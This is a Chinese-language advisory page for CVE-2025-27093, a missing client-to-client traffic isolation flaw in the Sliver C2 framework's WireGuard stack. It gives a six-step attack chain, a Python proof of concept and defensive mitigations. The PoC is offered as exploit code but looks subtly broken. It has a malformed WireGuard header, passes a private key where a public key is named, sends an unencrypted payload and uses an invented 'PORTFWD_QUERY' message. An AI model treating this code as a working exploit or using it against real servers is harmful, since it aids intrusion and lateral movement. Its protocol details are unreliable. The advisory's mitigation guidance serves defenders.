CVE-2025-27093 Sliver Wireguard客户端间流量隔离缺失漏洞

漏洞信息

漏洞编号

CVE-2025-27093

漏洞类型

访问控制/安全配置错误

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Sliver

漏洞概述

CVE-2025-27093是Sliver命令和控制框架中的一个安全漏洞。Sliver是一款开源的渗透测试工具，被红队操作员和攻击性安全研究人员广泛使用。该框架采用自定义的Wireguard网络栈实现通信功能。在1.5.43及更早版本以及开发版本1.6.0-dev中，由于netstack实现存在缺陷，Wireguard客户端之间的流量未受到适当的隔离和限制。这一安全漏洞允许连接到同一Sliver服务器的多个客户端（ implants）之间进行无限制的直接通信。攻击者可能利用此漏洞通过泄露或恢复的密钥对发动攻击，例如冒充其他客户端与操作者通信、窃听客户端间通信内容或利用端口转发功能从其他植入物访问内部网络资源。该漏洞的CVSS评分为6.3，属于中等严重程度，攻击复杂度低，无需特殊权限，但需要用户交互。

技术细节

Sliver框架使用自定义开发的Wireguard兼容网络栈来处理客户端与服务器之间的加密通信。该网络栈在设计上模拟了Wireguard的点对点通信模型，但在1.5.43及更早版本中，服务器端未能正确实现客户端流量的隔离机制。Wireguard协议本身设计为点对点通信，客户端之间可以直接交换数据包。然而，在C2框架的上下文中，不同的植入物（implants）应该被视为独立的客户端，它们之间的直接通信应该被服务器显式控制或完全禁止。由于缺乏流量过滤逻辑，连接到同一Sliver服务器的恶意植入物可以向其他植入物发送任意数据包，包括端口转发请求、命令控制流量等。攻击者可以利用泄露的会话密钥或通过社会工程获取的密钥，建立到Sliver服务器的连接，然后尝试与其他在线植入物建立直接通信隧道。此外，由于端口转发功能缺乏客户端级别的访问控制，一个植入物的端口转发可能被其他恶意植入物滥用。

攻击链分析

STEP 1

步骤1

攻击者获取Sliver会话密钥：通过社会工程、恶意软件分析、内存取证或内部人员泄露等方式获取有效的Sliver客户端公钥和私钥对

STEP 2

步骤2

建立恶意连接：使用获取的密钥连接到目标Sliver服务器的Wireguard接口，与其他合法植入物建立并发的客户端连接

STEP 3

步骤3

利用流量隔离缺失：由于服务器端未实现客户端间流量过滤，攻击者可以直接向其他植入物发送Wireguard数据包，绕过服务器中转

STEP 4

步骤4

发动中间人攻击或窃听：攻击者可以拦截、篡改或注入客户端间的通信内容，可能获取敏感操作数据或命令执行结果

STEP 5

步骤5

滥用端口转发功能：利用其他植入物的端口转发服务，从一个植入物访问通过另一个植入物暴露的内部网络资源，实现横向移动

STEP 6

步骤6

冒充操作者或植入物：利用泄露的密钥伪装成可信实体，向操作者或其他植入物发送恶意命令或诱导信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-27093 PoC - Sliver Wireguard Client-to-Client Traffic Isolation Bypass
// This PoC demonstrates the lack of traffic isolation between Sliver wireguard clients

import socket
import struct
import time

def create_wireguard_packet(src_pubkey, dst_pubkey, payload):
    """
    Craft a Wireguard packet to send directly between clients.
    In vulnerable Sliver versions, no server-side validation exists.
    """
    # Wireguard packet header structure
    packet_type = 0x04  # Transport data packet
    reserved = bytes([0] * 3)
    
    # Construct the packet
    header = struct.pack('>I', packet_type) + reserved
    receiver = dst_pubkey  # Target client public key
    sender = src_pubkey    # Attacker public key
    
    # Encrypted payload would go here (simplified for demonstration)
    encrypted_payload = payload
    
    return header + receiver + sender + encrypted_payload

def exploit_sliver_client_isolation(target_ip, target_port, attacker_privkey, target_pubkey):
    """
    Exploit the client isolation bypass to communicate with other implants.
    """
    try:
        # Craft a packet as if from the attacker implant
        packet = create_wireguard_packet(
            attacker_privkey,  # Attacker's public key
            target_pubkey,     # Target implant's public key
            b'\x01\x00\x00\x00'  # Control message
        )
        
        # Send directly to the Sliver server
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        sock.sendto(packet, (target_ip, target_port))
        
        print(f"[+] Packet sent to {target_ip}:{target_port}")
        print(f"[+] Target implant: {target_pubkey.hex()}")
        print("[+] In vulnerable versions, this packet reaches the target implant directly")
        
        # Try to receive response
        try:
            data, addr = sock.recvfrom(4096)
            print(f"[+] Received response from {addr}: {data.hex()}")
        except socket.timeout:
            print("[-] No response received (may indicate patch or wrong target)")
        
        sock.close()
        return True
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def scan_for_exposed_port_forwards(sliver_server_ip, port):
    """
    Attempt to access port forwards from other implants.
    """
    try:
        # Connect directly to the Sliver server's wireguard interface
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(3)
        
        # Craft connection request to access another implant's port forward
        request = b'PORTFWD_QUERY' + struct.pack('>H', port)
        sock.sendto(request, (sliver_server_ip, 51820))
        
        print(f"[+] Sent port forward query for port {port}")
        sock.close()
        return True
        
    except Exception as e:
        print(f"[-] Error scanning port forwards: {e}")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-27093 - Sliver Wireguard Client Isolation Bypass")
    print("=" * 60)
    
    # Configuration - replace with actual values
    sliver_server = "192.168.1.100"
    port = 51820
    attacker_key = bytes.fromhex("" + "00" * 32)
    target_key = bytes.fromhex("" + "11" * 32)
    
    # Exploit client-to-client communication
    exploit_sliver_client_isolation(sliver_server, port, attacker_key, target_key)
    
    # Try to access exposed port forwards
    scan_for_exposed_port_forwards(sliver_server, 8080)

影响范围

Sliver <= 1.5.43

Sliver 1.6.0-dev

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制Sliver服务器的访问，仅允许授权的操作终端连接；2) 监控网络流量，检测异常的客户端间直接通信；3) 定期轮换所有会话密钥和证书；4) 避免在不同任务间共享密钥材料；5) 限制端口转发功能的使用范围；6) 启用Sliver的操作审计日志，记录所有客户端活动。